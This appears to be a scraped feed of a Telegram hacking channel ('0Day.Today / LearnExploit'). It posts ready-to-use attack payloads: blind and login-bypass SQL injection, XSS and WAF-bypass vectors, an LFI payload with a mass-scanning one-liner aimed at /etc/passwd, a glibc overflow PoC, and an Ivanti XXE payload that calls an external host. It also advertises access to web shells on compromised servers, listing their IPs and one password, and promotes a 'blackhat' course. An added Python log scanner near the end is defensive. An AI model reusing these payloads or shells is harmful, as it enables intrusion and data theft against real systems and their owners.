0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

Ads: @LearnExploitAds

IR0Day.Today
Blind SQL Injection payload

if(now()=sysdate()%2Csleep(10)%2C0)

#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Blackhat hacking course

Download

#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
🙏 apiosintDS 🙏

On demand query API for Threat-Intel project.

💬
apiosintDS is a Python client library for the public API lookup service over OSINT IoCs stored in the DigitalSide Threat-Intel repository. It can be defined as a Service-as-a-Library tool designed to act both as a standard Python library to be included in your own Python application and as a command-line tool. Queries can be performed against suspicious IPs, domains, URLs and file hashes. Stored data has a 7-day retention.

🔼 Install:
The easy way via pip:
👩‍💻 pip3 install apiosintDS

👩‍💻 From sources:
`apiosintDS
python3 -m pip install .`

👥 Example:
apiosintDS -e 7cb796c875cccc9233d82854a4e2fdf0
apiosintDS -e h[REMOVED]p://193.35.18.147/bins/k.arm -st -p -nc

😸 Github

⬇️ Download
🔒 LearnExploit

#api #ioc #cybersecurity

🔥 0Day.Today
📣 T.me/LearnExploit
👁‍🗨 You probably know that

👩‍💻 <Img Src=javascript:alert(1)>

🚫 Doesn't work anymore (although several lists out there have it)

🔄 But if you add

👩‍💻 OnError=location=src

It does!

👁‍🗨 Example:
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E

⚠️ Not so useful but who knows your next inline injection scenario?

#XSS

🔥 0Day.Today
📣 T.me/LearnExploit
🕸 Site
👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface

📣 T.me/BugCod3
📣 T.me/LearnExploit
PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell

📣 T.me/BugCod3
📣 T.me/LearnExploit
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

📣 T.me/BugCod3
📣 T.me/LearnExploit
Akamai WAF

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>

Vector PoC

#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog

POC :

(exec -a "printf '%0128000x' 1" /usr/bin/su < /dev/null)

#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
[+] Filter bypass techniques:

Sometimes you can do amazing things just by appending /? to bypass access control restrictions

POC:
https://targetdomain/api/endpoint <-- Access Denied

https://targetdomain/api/endpoint/? <--- Access to entire customer database

#AEMSecurity #FilterBypass #bugbountytips

🔥 0Day.Today
📣 T.me/LearnExploit
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.

Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay

#VPD #BugBounty #security

🔥 0Day.Today
📣 T.me/LearnExploit
🕵️‍♂️ PacketSpy 🕵️‍♂️

💬 Description:
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.

📊 Features:
⚪️ Packet Capture: Capture and analyze network packets in real-time.
⚪️ HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
⚪️ Raw Payload Viewing: View raw payload data for deeper investigation.
⚪️ Device Information: Gather information about network devices, including IP addresses and MAC addresses.

🔼 Installation:
cd PacketSpy
pip install -r requirements.txt


💻 Usage:
python3 packetspy.py --help


📂 Examples:
#Device Detection
python3 packetspy.py -tf 10.0.2.0/24 -i eth0

#Man-in-the-Middle Sniffing
python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0


😸 Github

⬇️ Download
🔒 LearnExploit

#Python #Network #Packet #Sniffing #Tools

🔥 0Day.Today
📣 T.me/LearnExploit
PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell

🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit
CloudFlare Bypass

<Img Src=OnXSS OnError=alert(1)>

#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
LFI Payload⚡️

Payload: 


".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Sick Finding 🥵⚡️

cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt

#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
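
Added example (not part of the channel's posts): a log-side check for the double-encoded `.%252e/` sequence shown in the two posts above. It percent-decodes each request target until the string is stable and flags `..` path segments; the function names, verdict labels and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_ROUNDS = 5  # bound the decode loop so deeply nested encodings cannot stall a scan
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # ".." as a whole path segment
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')  # client, request target

# Constructed access-log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] '
    '"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1" 404 0',
    '192.0.2.11 - - [01/Jan/2024:00:00:03 +0000] "GET /docs/a%20b.pdf HTTP/1.1" 200 100',
    '198.51.100.9 - - [01/Jan/2024:00:00:04 +0000] "GET /static/..%2f..%2fetc/passwd HTTP/1.1" 400 0',
]

def decode_fully(target):
    """Percent-decode until stable; return (decoded, number of passes that changed it)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds

def classify(target):
    """Label a request target by whether '..' segments appear and how deeply they were encoded."""
    decoded, rounds = decode_fully(target)
    if not TRAVERSAL.search(decoded):
        return "ok"
    if rounds >= 2:  # dots hidden behind %25, as in ".%252e"
        return "traversal-multi-encoded"
    return "traversal-encoded" if rounds == 1 else "traversal-plain"

def scan(log_lines):
    """Return (client, verdict) for every log line whose request target is not 'ok'."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and (verdict := classify(m.group(2))) != "ok":
            hits.append((m.group(1), verdict))
    return hits

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

After a single decode pass the payload still reads `.%2e/`, so a filter that decodes once and then looks for `../` misses it; the pass count in the verdict makes that case visible.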
CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army